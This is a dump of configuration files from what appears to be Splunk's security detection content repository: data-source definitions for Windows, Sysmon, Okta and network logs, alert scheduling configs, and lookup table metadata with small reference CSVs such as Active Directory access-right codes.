changes. 8 | mitre_components: 9 | - User Account Authentication 10 | - Logon Session Creation 11 | - User Account Metadata 12 | - Configuration Modification 13 | - Application Log Content 14 | source: Okta 15 | sourcetype: OktaIM2:log 16 | supported_TA: 17 | - name: Splunk Add-on for Okta Identity Cloud 18 | url: https://splunkbase.splunk.com/app/6553 19 | version: 3.0.0 20 | output_fields: 21 | - dest 22 | - src 23 | - user -------------------------------------------------------------------------------- /data_sources/powershell_sip_inventory.yml: -------------------------------------------------------------------------------- 1 | name: Powershell SIP Inventory 2 | id: 5ef5cb5d-1fa8-4567-b48f-27317662cd73 3 | version: 2 4 | date: '2025-01-23' 5 | author: Patrick Bareiss, Splunk 6 | description: Logs the inventory of System Integrity Policies (SIP) on a system retrieved 7 | via PowerShell, including details about policy configurations and statuses. 8 | mitre_components: 9 | - Configuration Modification 10 | - Host Status 11 | - Application Log Content 12 | - OS API Execution 13 | source: powershell://SubjectInterfacePackage 14 | sourcetype: PwSh:SubjectInterfacePackage 15 | supported_TA: [] 16 | -------------------------------------------------------------------------------- /data_sources/splunk_common_information_model_(cim).yml: -------------------------------------------------------------------------------- 1 | name: Splunk Common Information Model (CIM) 2 | id: d3dd8270-7e1c-4bcd-8f3a-e5ec4a0e740a 3 | version: 1 4 | date: '2025-01-14' 5 | author: Bhavin Patel, Splunk 6 | description: Data source object for Splunk CIM 7 | source: not_applicable 8 | sourcetype: not_applicable 9 | supported_TA: 10 | - name: Splunk Common Information Model (CIM) 11 | url: https://splunkbase.splunk.com/app/1621 12 | version: 6.0.4 13 | -------------------------------------------------------------------------------- /data_sources/splunk_stream_tcp.yml: 
-------------------------------------------------------------------------------- 1 | name: Splunk Stream TCP 2 | id: 4b1233d1-f80a-4da1-ab27-a5b10ea8a4ce 3 | version: 2 4 | date: '2025-01-23' 5 | author: Patrick Bareiss, Splunk 6 | description: Logs TCP traffic captured by Splunk Stream, including details about source 7 | and destination IPs, ports, connection states, and packet-level metadata. 8 | mitre_components: 9 | - Network Traffic Content 10 | - Network Traffic Flow 11 | - Network Connection Creation 12 | - Response Metadata 13 | - Application Log Content 14 | source: stream:tcp 15 | sourcetype: stream:tcp 16 | supported_TA: 17 | - name: Splunk Stream 18 | url: https://splunkbase.splunk.com/app/1809 19 | version: 8.1.5 20 | -------------------------------------------------------------------------------- /data_sources/sysmon_eventid_14.yml: -------------------------------------------------------------------------------- 1 | name: Sysmon EventID 14 2 | id: 77c4b345-0eab-415e-98c6-f4114b021723 3 | version: 1 4 | date: '2025-02-21' 5 | author: Bhavin Patel, Splunk 6 | description: Data source object for Sysmon EventID 14 7 | source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational 8 | sourcetype: xmlwineventlog 9 | separator: EventID 10 | configuration: https://github.com/SwiftOnSecurity/sysmon-config 11 | supported_TA: 12 | - name: Splunk Add-on for Sysmon 13 | url: https://splunkbase.splunk.com/app/5709 14 | version: 4.0.2 15 | fields: 16 | - _time 17 | example_log: |- 18 | -------------------------------------------------------------------------------- /data_sources/windows_event_log_printservice_4909.yml: -------------------------------------------------------------------------------- 1 | name: Windows Event Log Printservice 4909 2 | id: 4c00e353-18b8-4de6-896d-83bc5817dbaa 3 | version: 1 4 | date: '2025-02-21' 5 | author: Bhavin Patel, Splunk 6 | description: Data source object for Windows Event Log Printservice 4909 7 | source: XmlWinEventLog:Security 8 
| sourcetype: xmlwineventlog 9 | separator: EventCode 10 | supported_TA: 11 | - name: Splunk Add-on for Microsoft Windows 12 | url: https://splunkbase.splunk.com/app/742 13 | version: 9.0.1 14 | fields: 15 | - _time 16 | example_log: |- 17 | -------------------------------------------------------------------------------- /data_sources/windows_event_log_security_4728.yml: -------------------------------------------------------------------------------- 1 | name: Windows Event Log Security 4728 2 | id: c0cb4907-d715-41f2-a98a-4f4e75f248c1 3 | version: 1 4 | date: '2025-02-21' 5 | author: Bhavin Patel, Splunk 6 | description: Data source object for Windows Event Log Security 4728 7 | source: XmlWinEventLog:Security 8 | sourcetype: xmlwineventlog 9 | separator: EventCode 10 | supported_TA: 11 | - name: Splunk Add-on for Microsoft Windows 12 | url: https://splunkbase.splunk.com/app/742 13 | version: 9.0.1 14 | fields: 15 | - _time 16 | output_fields: 17 | - dest 18 | example_log: |- 19 | -------------------------------------------------------------------------------- /data_sources/windows_event_log_security_4731.yml: -------------------------------------------------------------------------------- 1 | name: Windows Event Log Security 4731 2 | id: 1bbc004e-a75e-4d94-a619-c5aaf5d11ed5 3 | version: 1 4 | date: '2025-02-21' 5 | author: Bhavin Patel, Splunk 6 | description: Data source object for Windows Event Log Security 4731 7 | source: XmlWinEventLog:Security 8 | sourcetype: xmlwineventlog 9 | separator: EventCode 10 | supported_TA: 11 | - name: Splunk Add-on for Microsoft Windows 12 | url: https://splunkbase.splunk.com/app/742 13 | version: 9.0.1 14 | fields: 15 | - _time 16 | output_fields: 17 | - dest 18 | example_log: |- 19 | -------------------------------------------------------------------------------- /data_sources/windows_event_log_security_4744.yml: -------------------------------------------------------------------------------- 1 | name: Windows Event Log 
Security 4744 2 | id: 244e0bd4-00b0-4091-b8b4-9d435aca6ad8 3 | version: 1 4 | date: '2025-02-21' 5 | author: Bhavin Patel, Splunk 6 | description: Data source object for Windows Event Log Security 4744 7 | source: XmlWinEventLog:Security 8 | sourcetype: xmlwineventlog 9 | separator: EventCode 10 | supported_TA: 11 | - name: Splunk Add-on for Microsoft Windows 12 | url: https://splunkbase.splunk.com/app/742 13 | version: 9.0.1 14 | fields: 15 | - _time 16 | output_fields: 17 | - dest 18 | example_log: |- 19 | -------------------------------------------------------------------------------- /data_sources/windows_event_log_security_4749.yml: -------------------------------------------------------------------------------- 1 | name: Windows Event Log Security 4749 2 | id: eb322056-01a3-4cd5-bc09-01140d33194a 3 | version: 1 4 | date: '2025-02-21' 5 | author: Bhavin Patel, Splunk 6 | description: Data source object for Windows Event Log Security 4749 7 | source: XmlWinEventLog:Security 8 | sourcetype: xmlwineventlog 9 | separator: EventCode 10 | supported_TA: 11 | - name: Splunk Add-on for Microsoft Windows 12 | url: https://splunkbase.splunk.com/app/742 13 | version: 9.0.1 14 | fields: 15 | - _time 16 | output_fields: 17 | - dest 18 | example_log: |- 19 | -------------------------------------------------------------------------------- /data_sources/windows_event_log_security_4754.yml: -------------------------------------------------------------------------------- 1 | name: Windows Event Log Security 4754 2 | id: 501a507e-3275-4c4b-9c44-53eecfeae487 3 | version: 1 4 | date: '2025-02-21' 5 | author: Bhavin Patel, Splunk 6 | description: Data source object for Windows Event Log Security 4754 7 | source: XmlWinEventLog:Security 8 | sourcetype: xmlwineventlog 9 | separator: EventCode 10 | supported_TA: 11 | - name: Splunk Add-on for Microsoft Windows 12 | url: https://splunkbase.splunk.com/app/742 13 | version: 9.0.1 14 | fields: 15 | - _time 16 | output_fields: 17 | - dest 
18 | example_log: |- 19 | -------------------------------------------------------------------------------- /data_sources/windows_event_log_security_4759.yml: -------------------------------------------------------------------------------- 1 | name: Windows Event Log Security 4759 2 | id: 431e3520-505b-4ace-aced-cb51e3f7311e 3 | version: 1 4 | date: '2025-02-21' 5 | author: Bhavin Patel, Splunk 6 | description: Data source object for Windows Event Log Security 4759 7 | source: XmlWinEventLog:Security 8 | sourcetype: xmlwineventlog 9 | separator: EventCode 10 | supported_TA: 11 | - name: Splunk Add-on for Microsoft Windows 12 | url: https://splunkbase.splunk.com/app/742 13 | version: 9.0.1 14 | fields: 15 | - _time 16 | output_fields: 17 | - dest 18 | example_log: |- 19 | -------------------------------------------------------------------------------- /data_sources/windows_event_log_security_4783.yml: -------------------------------------------------------------------------------- 1 | name: Windows Event Log Security 4783 2 | id: 6b945150-785c-49a1-b705-56b42215630b 3 | version: 1 4 | date: '2025-02-21' 5 | author: Bhavin Patel, Splunk 6 | description: Data source object for Windows Event Log Security 4783 7 | source: XmlWinEventLog:Security 8 | sourcetype: xmlwineventlog 9 | separator: EventCode 10 | supported_TA: 11 | - name: Splunk Add-on for Microsoft Windows 12 | url: https://splunkbase.splunk.com/app/742 13 | version: 9.0.1 14 | fields: 15 | - _time 16 | output_fields: 17 | - dest 18 | example_log: |- 19 | -------------------------------------------------------------------------------- /data_sources/windows_event_log_security_4790.yml: -------------------------------------------------------------------------------- 1 | name: Windows Event Log Security 4790 2 | id: 1cc6ecbb-af04-432b-a224-02c65243ac88 3 | version: 1 4 | date: '2025-02-21' 5 | author: Bhavin Patel, Splunk 6 | description: Data source object for Windows Event Log Security 4790 7 | source: 
XmlWinEventLog:Security 8 | sourcetype: xmlwineventlog 9 | separator: EventCode 10 | supported_TA: 11 | - name: Splunk Add-on for Microsoft Windows 12 | url: https://splunkbase.splunk.com/app/742 13 | version: 9.0.1 14 | fields: 15 | - _time 16 | output_fields: 17 | - dest 18 | example_log: |- 19 | -------------------------------------------------------------------------------- /data_sources/windows_event_log_system_104.yml: -------------------------------------------------------------------------------- 1 | name: Windows Event Log System 104 2 | id: 577b9b41-6b37-44c4-9016-3d890b909050 3 | version: 1 4 | date: '2025-02-21' 5 | author: Bhavin Patel, Splunk 6 | description: Data source object for Windows Event Log System 104 7 | source: XmlWinEventLog:Security 8 | sourcetype: xmlwineventlog 9 | separator: EventCode 10 | supported_TA: 11 | - name: Splunk Add-on for Microsoft Windows 12 | url: https://splunkbase.splunk.com/app/742 13 | version: 9.0.1 14 | fields: 15 | - _time 16 | output_fields: 17 | - dest 18 | example_log: |- 19 | -------------------------------------------------------------------------------- /data_sources/windows_event_log_taskscheduler_201.yml: -------------------------------------------------------------------------------- 1 | name: Windows Event Log TaskScheduler 201 2 | id: 4c09ae64-01cd-4b65-8221-20f803b0d86e 3 | version: 1 4 | date: '2025-02-21' 5 | author: Bhavin Patel, Splunk 6 | description: Data source object for Windows Event Log TaskScheduler 201 7 | source: XmlWinEventLog:Security 8 | sourcetype: xmlwineventlog 9 | separator: EventCode 10 | supported_TA: 11 | - name: Splunk Add-on for Microsoft Windows 12 | url: https://splunkbase.splunk.com/app/742 13 | version: 9.0.1 14 | fields: 15 | - _time 16 | output_fields: 17 | - dest 18 | example_log: |- 19 | -------------------------------------------------------------------------------- /data_sources/windows_iis.yml: 
--------------------------------------------------------------------------------
name: Windows IIS
id: 469335b3-b6ad-49e2-bbe6-47e15c1464a7
version: 2
date: '2025-01-23'
author: Patrick Bareiss, Splunk
description: Logs changes to IIS server configuration, including updates to settings,
  modules, authentication methods, and site bindings.
mitre_components:
- Service Modification
- Cloud Service Modification
- Configuration Modification
- Application Log Content
source: IIS:Configuration:Operational
sourcetype: IIS:Configuration:Operational
separator: EventID
supported_TA:
- name: Splunk Add-on for Microsoft Windows
  url: https://splunkbase.splunk.com/app/742
  version: 9.0.1
--------------------------------------------------------------------------------
/deployments/escu_default_configuration_anomaly.yml:
--------------------------------------------------------------------------------
name: ESCU Default Configuration Anomaly
id: a9e210c6-9f50-4f8b-b60e-71bb26e4f216
date: '2021-12-21'
author: Patrick Bareiss
description: This configuration file applies to all detections of type anomaly.
  These detections will use Risk Based Alerting.
scheduling:
  cron_schedule: 0 * * * *
  earliest_time: -70m@m
  latest_time: -10m@m
  schedule_window: auto
alert_action:
  rba:
    enabled: true
type: Anomaly
--------------------------------------------------------------------------------
/deployments/escu_default_configuration_baseline.yml:
--------------------------------------------------------------------------------
name: ESCU Default Configuration Baseline
id: 0f7ee854-1aad-4bef-89c5-5c402b488510
date: '2021-12-21'
author: Patrick Bareiss
description: This configuration file applies to all detections of type baseline.
scheduling:
  cron_schedule: 10 0 * * *
  earliest_time: -1450m@m
  latest_time: -10m@m
  schedule_window: auto
type: Baseline
--------------------------------------------------------------------------------
/deployments/escu_default_configuration_correlation.yml:
--------------------------------------------------------------------------------
name: ESCU Default Configuration Correlation
id: 36ba498c-46e8-4b62-8bde-67e984a40fb4
date: '2021-12-21'
author: Patrick Bareiss
description: This configuration file applies to all detections of type Correlation.
  These correlations will generate Notable Events.
scheduling:
  cron_schedule: 0 * * * *
  earliest_time: -70m@m
  latest_time: -10m@m
  schedule_window: auto
alert_action:
  notable:
    rule_description: '%description%'
    rule_title: '%name%'
    nes_fields:
    - user
    - dest
type: Correlation
--------------------------------------------------------------------------------
/deployments/escu_default_configuration_hunting.yml:
--------------------------------------------------------------------------------
name: ESCU Default Configuration Hunting
id: cc5895e8-3420-4ab7-af38-cf87a28f9c3b
date: '2021-12-21'
author: Patrick Bareiss
description: This configuration file applies to all detections of type hunting.
scheduling:
  cron_schedule: 0 * * * *
  earliest_time: -70m@m
  latest_time: -10m@m
  schedule_window: auto
type: Hunting
--------------------------------------------------------------------------------
/deployments/escu_default_configuration_ttp.yml:
--------------------------------------------------------------------------------
name: ESCU Default Configuration TTP
id: b81cd059-a3e8-4c03-96ca-e168c50ff70b
date: '2021-12-21'
author: Patrick Bareiss
description: This configuration file applies to all detections of type TTP.
  These detections will use Risk Based Alerting and generate Notable Events.
scheduling:
  cron_schedule: 0 * * * *
  earliest_time: -70m@m
  latest_time: -10m@m
  schedule_window: auto
alert_action:
  notable:
    rule_description: '%description%'
    rule_title: '%name%'
    nes_fields:
    - user
    - dest
  rba:
    enabled: true
type: TTP
--------------------------------------------------------------------------------
/detections/deprecated/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/detections/deprecated/.gitkeep
--------------------------------------------------------------------------------
/dist/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/dist/.gitkeep
--------------------------------------------------------------------------------
/docs/.gitignore:
--------------------------------------------------------------------------------
_site
.sass-cache
.jekyll-cache
.jekyll-metadata
vendor
--------------------------------------------------------------------------------
/docs/mitre-map/coverage.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/docs/mitre-map/coverage.png
--------------------------------------------------------------------------------
/docs/static/attack_range.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/docs/static/attack_range.png
--------------------------------------------------------------------------------
/docs/static/escu_app_logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/docs/static/escu_app_logo.png
--------------------------------------------------------------------------------
/docs/static/escu_sb.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/docs/static/escu_sb.png
--------------------------------------------------------------------------------
/docs/static/feature_detection.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/docs/static/feature_detection.png
--------------------------------------------------------------------------------
/docs/static/feature_playbooks.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/docs/static/feature_playbooks.png
--------------------------------------------------------------------------------
/docs/static/feature_stories.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/docs/static/feature_stories.png
--------------------------------------------------------------------------------
/docs/static/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/docs/static/logo.png
--------------------------------------------------------------------------------
/docs/static/splunk_banner.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/docs/static/splunk_banner.png
--------------------------------------------------------------------------------
/docs/static/structure.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/docs/static/structure.png
--------------------------------------------------------------------------------
/docs/static/team_photo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/docs/static/team_photo.png
--------------------------------------------------------------------------------
/docs/yaml-spec/macros_spec.yml:
--------------------------------------------------------------------------------
name:
  type: str
  description: Name of the macro
  required: true
definition:
  type: str
  description: Definition of the macro, replace with configurations for your Splunk Environment
  required: true
description:
  type: str
  description: Description of the macro
  required: true
--------------------------------------------------------------------------------
/lookups/3cx_ioc_domains.yml:
--------------------------------------------------------------------------------
name: 3cx_ioc_domains
date: 2024-12-23
version: 2
id: 65c25399-4081-4ef1-b791-86f497d3380d
author: Splunk Threat Research Team
lookup_type: csv
description: A list of domains from the 3CX supply chain attack.
match_type:
- WILDCARD(domain)
min_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/__mlspl_detect_dns_data_exfiltration_using_pretrained_model_in_dsdl.yml:
--------------------------------------------------------------------------------
name: __mlspl_detect_dns_data_exfiltration_using_pretrained_model_in_dsdl
date: 2024-12-23
version: 2
id: db5df924-c34c-4b0f-9333-a08b2af98e65
author: Splunk Threat Research Team
lookup_type: mlmodel
description: Detect DNS Data Exfiltration using pretrained Model in DSDL
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/__mlspl_detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl.yml:
--------------------------------------------------------------------------------
name: __mlspl_detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl
date: 2024-12-23
version: 2
id: d5099bcb-420e-4eec-9714-db0590ea4f03
author: Splunk Threat Research Team
lookup_type: mlmodel
description: Detect suspicious DNS txt records using Pretrained Model in DSDL
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/__mlspl_detect_suspicious_processnames_using_pretrained_model_in_dsdl.yml:
--------------------------------------------------------------------------------
name: __mlspl_detect_suspicious_processnames_using_pretrained_model_in_dsdl
date: 2024-12-23
version: 2
id: 4660425a-4fdb-4a25-895b-abbd2557aa64
author: Splunk Threat Research Team
lookup_type: mlmodel
description: Detect a suspicious processname using Pretrained Model in DSDL
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/__mlspl_pretrained_dga_model_dsdl.yml:
--------------------------------------------------------------------------------
name: __mlspl_pretrained_dga_model_dsdl
date: 2024-12-23
version: 2
id: 6c55ccdb-7006-4367-80b6-55bee5eae1a2
author: Splunk Threat Research Team
lookup_type: mlmodel
description: Detect DGA domains using Pretrained Model in DSDL
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/__mlspl_unusual_commandline_detection.yml:
--------------------------------------------------------------------------------
name: __mlspl_unusual_commandline_detection
date: 2024-12-23
version: 2
id: e340177d-f2c5-4cb7-8b13-9f484934f648
author: Splunk Threat Research Team
lookup_type: mlmodel
description: An MLTK model for detecting malicious commandlines
case_sensitive_match: false
min_matches: 1
--------------------------------------------------------------------------------
/lookups/ace_access_rights_lookup.csv:
--------------------------------------------------------------------------------
access_rights_string,access_rights_value
RC,Read permissions
SD,Delete
WD,Modify permissions
WO,Modify owner
RP,Read all properties
WP,Write all properties
CC,Create all child objects
DC,Delete all child objects
LC,List contents
SW,All validated writes
LO,List objects
DT,Delete subtree
CR,All extended rights
--------------------------------------------------------------------------------
/lookups/ace_access_rights_lookup.yml:
--------------------------------------------------------------------------------
name: ace_access_rights_lookup
date: 2024-12-23
version: 2
id: 26cf3fc4-cee2-431a-9583-c4a404a25275
author: Splunk Threat Research Team
lookup_type: csv
description: A lookup file that will contain translations for AD object ace access rights strings
--------------------------------------------------------------------------------
/lookups/ace_flag_lookup.csv:
--------------------------------------------------------------------------------
flag_string,flag_value
CI,Container inherit
OI,Object inherit
NP,No propagate
IO,Inherit only
ID,Inherited
SA,Audit success
FA,Audit failure
TP,Trust protected filter
CR,Critical
--------------------------------------------------------------------------------
/lookups/ace_flag_lookup.yml:
--------------------------------------------------------------------------------
name: ace_flag_lookup
date: 2024-12-23
version: 2
id: 1795f9f3-008a-4b6c-9d7b-9e79b15da9fc
author: Splunk Threat Research Team
lookup_type: csv
description: A lookup file that will contain translations for AD object ace flags strings
--------------------------------------------------------------------------------
/lookups/ace_type_lookup.csv:
--------------------------------------------------------------------------------
ace_type_string,ace_type_value
A,Access allowed
D,Access denied
OA,Object access allowed
OD,Object access denied
AU,Audit
AL,Alarm
OU,Object audit
OL,Object alarm
ML,Mandatory label
XA,Callback access allowed
XD,Callback access denied
RA,Resource attribute
SP,Scoped policy ID
XU,Callback audit
ZA,Callback object access allowed
TL,Process trust label
FL,Access filter
--------------------------------------------------------------------------------
/lookups/ace_type_lookup.yml:
--------------------------------------------------------------------------------
name: ace_type_lookup
date: 2024-12-23
version: 2
id: 86e4531f-a37e-430c-9d5f-1447af2bc619
author: Splunk Threat Research Team
lookup_type: csv
description: A lookup file that will contain translations for AD object ace type strings
--------------------------------------------------------------------------------
/lookups/advanced_audit_policy_guids.yml:
--------------------------------------------------------------------------------
name: advanced_audit_policy_guids
date: 2024-12-23
version: 2
id: e2581a3a-1254-4b93-ae8f-ccde22362f0c
author: Splunk Threat Research Team
lookup_type: csv
description: List of GUIDs associated with Windows advanced audit policies
match_type:
- WILDCARD(GUID)
min_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/api_call_by_user_baseline.yml:
--------------------------------------------------------------------------------
name: api_call_by_user_baseline
date: 2024-12-23
version: 2
id: 6f4b0d42-5f24-4992-98f9-aebbc7ced9bf
author: Splunk Threat Research Team
lookup_type: kvstore
description: A collection that will contain the baseline information for number of
  AWS API calls per user
fields:
- _key
- arn
- latestCount
- numDataPoints
- avgApiCalls
- stdevApiCalls
--------------------------------------------------------------------------------
/lookups/applockereventcodes.yml:
--------------------------------------------------------------------------------
name: applockereventcodes
date: 2024-12-23
version: 2
id: 2fd8cc84-f4c8-4ab6-bd57-596f714a315f
author: Splunk Threat Research Team
lookup_type: csv
description: A csv of the ID and rule name for AppLocker event codes.
match_type:
- WILDCARD(AppLocker_Event_Code)
min_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/asr_rules.yml:
--------------------------------------------------------------------------------
name: asr_rules
date: 2025-01-29
version: 3
id: 3886d687-ae77-4a61-99eb-e745083e391e
author: Splunk Threat Research Team
lookup_type: csv
description: A csv of the ID and rule name for ASR, Microsoft Attack Surface Reduction rules.
match_type:
- WILDCARD(ASR_Rule)
min_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/attacker_tools.yml:
--------------------------------------------------------------------------------
name: attacker_tools
date: 2025-03-18
version: 3
id: 72620fe1-26cb-4cee-a6ee-8c6127056d81
author: Splunk Threat Research Team
lookup_type: csv
description: A list of tools used by attackers
match_type:
- WILDCARD(attacker_tool_names)
min_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/aws_service_accounts.csv:
--------------------------------------------------------------------------------
identity
--------------------------------------------------------------------------------
/lookups/aws_service_accounts.yml:
--------------------------------------------------------------------------------
name: aws_service_accounts
date: 2024-12-23
version: 2
id: 33868b47-48b2-42ad-8acb-0416772ae664
author: Splunk Threat Research Team
lookup_type: csv
description: A lookup file that will contain AWS Service accounts
--------------------------------------------------------------------------------
/lookups/baseline_blocked_outbound_connections.csv:
--------------------------------------------------------------------------------
src_ip,numDataPoints,latestCount,avgBlockedConnections,stdevBlockedConnections
--------------------------------------------------------------------------------
/lookups/baseline_blocked_outbound_connections.yml:
--------------------------------------------------------------------------------
name: baseline_blocked_outbound_connections
date: 2024-12-23
version: 2
id: 3abebeea-215f-44aa-ba69-3c2e828b7887
author: Splunk Threat Research Team
lookup_type: csv
description: A lookup file that will contain the baseline information for number of
  blocked outbound connections
--------------------------------------------------------------------------------
/lookups/brandmonitoring_lookup.csv:
--------------------------------------------------------------------------------
domain,domain_abuse
--------------------------------------------------------------------------------
/lookups/brandmonitoring_lookup.yml:
--------------------------------------------------------------------------------
name: brandMonitoring_lookup
date: 2024-12-23
version: 2
id: 6fff763a-d654-42dc-8e56-92c8e255ac55
author: Splunk Threat Research Team
lookup_type: csv
description: A file that contains look-a-like domains for brands that you want to
  monitor
match_type:
- WILDCARD(domain)
min_matches: 1
--------------------------------------------------------------------------------
/lookups/browser_app_list.yml:
--------------------------------------------------------------------------------
name: browser_app_list
date: 2024-12-23
version: 2
id: a80ccd19-e46f-4a12-9ad7-e653ad646347
author: Splunk Threat Research Team
lookup_type: csv
description: A list of known browser application being targeted for credential extraction.
default_match: false
match_type:
- WILDCARD(browser_process_name)
- WILDCARD(browser_object_path)
min_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/builtin_groups_lookup.yml:
--------------------------------------------------------------------------------
name: builtin_groups_lookup
date: 2025-01-29
version: 3
id: 7d0a0c1c-2ef0-48a9-87c6-de97a0ad1ccf
author: Splunk Threat Research Team
lookup_type: csv
description: A lookup file that will contain translations for builtin AD group strings
--------------------------------------------------------------------------------
/lookups/char_conversion_matrix.yml:
--------------------------------------------------------------------------------
name: char_conversion_matrix
date: 2024-12-23
version: 2
id: 0177cf7b-8cf9-412a-9919-d1919b8d59dc
author: Splunk Threat Research Team
lookup_type: csv
description: A simple conversion matrix for converting to and from UTF8/16 base64/hex/decimal encoding. Created mosty from https://community.splunk.com/t5/Splunk-Search/base64-decoding-in-search/m-p/27572#M177741, with small modifications for UTF16LE parsing for powershell encoding.
match_type:
- WILDCARD(data)
min_matches: 1
case_sensitive_match: true
--------------------------------------------------------------------------------
/lookups/cisco_secure_firewall_appid_remote_mgmt_and_desktop_tools.yml:
--------------------------------------------------------------------------------
name: cisco_secure_firewall_appid_remote_mgmt_and_desktop_tools
date: 2025-05-28
version: 1
id: eda38373-77c4-4e42-89c8-f53fa58f5319
author: Nasreddine Bencherchali, Splunk Threat Research Team
lookup_type: csv
description: A list of secure firewall application detectors metadata related to remote desktop and remote management utilities.
min_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/cisco_secure_firewall_filetype_lookup.yml:
--------------------------------------------------------------------------------
name: cisco_secure_firewall_filetype_lookup
date: 2025-04-03
version: 1
id: 5850e5c3-543c-45b8-8b82-147ed49aba56
author: Nasreddine Bencherchali, Splunk Threat Research Team
lookup_type: csv
description: A list that maps filetypes in cisco secure firewall threat defense with their ids and description
min_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/cisco_snort_ids_to_threat_mapping.yml:
--------------------------------------------------------------------------------
name: cisco_snort_ids_to_threat_mapping
date: 2025-05-12
version: 1
id: f08ae6ce-d7a8-423e-a778-be7178a719f9
author: Bhavin Patel, Nasreddine Bencherchali, Splunk Threat Research Team
lookup_type: csv
case_sensitive_match: false
description: Mapping file of Snort IDs to Threats
min_matches: 1
--------------------------------------------------------------------------------
/lookups/cloud_instances_enough_data.yml:
--------------------------------------------------------------------------------
name: cloud_instances_enough_data
date: 2024-12-23
version: 2
id: 2aabac97-9782-4156-9dfd-7c1fb7aab2a6
author: Splunk Threat Research Team
lookup_type: kvstore
description: A lookup to determine if you have a sufficient amount of time has passed to collect cloud instance data for behavioral searches
fields:
- _key
- filter
- enough_data
match_type:
- WILDCARD(filter)
--------------------------------------------------------------------------------
/lookups/decommissioned_buckets.yml:
--------------------------------------------------------------------------------
name: decommissioned_buckets
date: 2025-02-14
version: 1
id: b3a95eff-87cf-40f3-b6e0-5b1a11eed68f
author: Bhavin Patel
lookup_type: kvstore
description: A lookup table of decommissioned S3 buckets created by baseline - Baseline of Open S3 Bucket Decommissioning. This lookup table is used by detections searches to trigger alerts when decommissioned buckets are detected.
min_matches: 1
fields:
- _key
- bucketName
- hosts
- firstEvent
- lastEvent
- events
- policy_details
- website_details
- accountIds
- userARNs
- awsRegions
--------------------------------------------------------------------------------
/lookups/discovered_dns_records.csv:
--------------------------------------------------------------------------------
count,domain,type,query,answer
--------------------------------------------------------------------------------
/lookups/discovered_dns_records.yml:
--------------------------------------------------------------------------------
name: discovered_dns_records
date: 2024-12-23
version: 2
id: ebf80033-0cc1-4256-a1cb-730ccbda36af
author: Splunk Threat Research Team
lookup_type: csv
description: A placeholder for a list of discovered DNS records generated by the baseline discover_dns_records
min_matches: 1
--------------------------------------------------------------------------------
/lookups/domain_admins.csv:
--------------------------------------------------------------------------------
username
Administrator
--------------------------------------------------------------------------------
/lookups/domain_admins.yml:
--------------------------------------------------------------------------------
name: domain_admins
date: 2024-12-23
version: 2
id: f4b5fe34-a474-4894-bdb9-7e3af6da1d94
author: Splunk Threat Research Team
lookup_type: csv
description: List of domain admins
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/domains.csv:
--------------------------------------------------------------------------------
domain,isValidDomain
--------------------------------------------------------------------------------
/lookups/domains.yml:
--------------------------------------------------------------------------------
name: domains
date: 2024-12-23
version: 2
id: b34f12f1-952d-4fe1-a5d9-18b81ca32244
author: Splunk Threat Research Team
lookup_type: csv
description: A list of domains that can be ignored
--------------------------------------------------------------------------------
/lookups/dynamic_dns_providers_default.yml:
--------------------------------------------------------------------------------
name: dynamic_dns_providers_default
date: 2025-01-29
version: 3
id: 37046407-ef07-48a5-b63d-384fd15b8c4b
author: Splunk Threat Research Team
lookup_type: csv
case_sensitive_match: false
description: A list of dynammic dns providers that should not be modified
match_type:
- WILDCARD(dynamic_dns_domains)
--------------------------------------------------------------------------------
/lookups/dynamic_dns_providers_local.csv:
--------------------------------------------------------------------------------
dynamic_dns_domains, isDynDNS_local
--------------------------------------------------------------------------------
/lookups/dynamic_dns_providers_local.yml:
--------------------------------------------------------------------------------
name: dynamic_dns_providers_local
date: 2024-12-23
version: 2
id: b3313546-95ec-4e0e-91ab-b87009c600a4
author: Splunk Threat Research Team
lookup_type: csv
case_sensitive_match: false
description: A list of dynammic dns providers that can be
  modified
match_type:
- WILDCARD(dynamic_dns_domains)
--------------------------------------------------------------------------------
